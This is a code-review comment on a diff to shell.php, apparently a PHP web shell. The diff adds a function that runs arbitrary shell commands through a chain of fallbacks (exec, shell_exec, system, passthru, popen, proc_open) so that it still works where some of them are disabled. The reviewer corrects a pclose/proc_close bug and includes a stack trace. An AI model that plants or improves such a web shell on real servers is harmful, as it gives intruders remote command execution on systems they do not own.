shell.php

```diff
@@ -32,6 +32,46 @@ function featureShell($cmd, $cwd) {
     );
 }
 
+function executeCommand($cmd) {
+    $output = "";
+    if (function_exists("exec")) {
+        exec($cmd, $output);
+        $output = implode("\n", $output);
+    } else if (function_exists("shell_exec")) {
+        $output = shell_exec($cmd);
+    } else if (allFunctionExist(["system", "ob_start", "ob_get_contents", "ob_end_clean"])) {
+        ob_start();
+        system($cmd);
+        $output = ob_get_contents();
+        ob_end_clean();
+    } else if (allFunctionExist(["passthru", "ob_start", "ob_get_contents", "ob_end_clean"])) {
+        ob_start();
+        passthru($cmd);
+        $output = ob_get_contents();
+        ob_end_clean();
+    } else if (allFunctionExist(["popen", "feof", "fread", "pclose"])) {
+        $handle = popen($cmd, 'r');
+        while (!feof($handle)) {
+            $output .= fread($handle, 4096);
+        }
+        pclose($handle);
+    } else if (allFunctionExist(["proc_open", "stream_get_contents", "pclose"])) {
+        $handle = proc_open($cmd, [0 => ["pipe", "r"], 1 => ["pipe", "w"]], $pipes);
+        $output = stream_get_contents($pipes[1]);
+        pclose($handle);
```

Comment:
```suggestion
        proc_close($handle);
```

`pclose()` is not the right function to use here. It raises the following error:

```
[Wed May 10 13:03:35 2023] 127.0.0.1:46464 [500]: POST /shell.php?feature=shell - Uncaught TypeError: pclose(): supplied resource is not a valid stream resource in [...]/shell.php:61
Stack trace:
#0 [...]/shell.php(61): pclose()
#1 [...]/shell.php(26): executeCommand()
#2 [...]/shell.php(136): featureShell()
#3 {main}
  thrown in [...]t/shell.php on line 61
  ```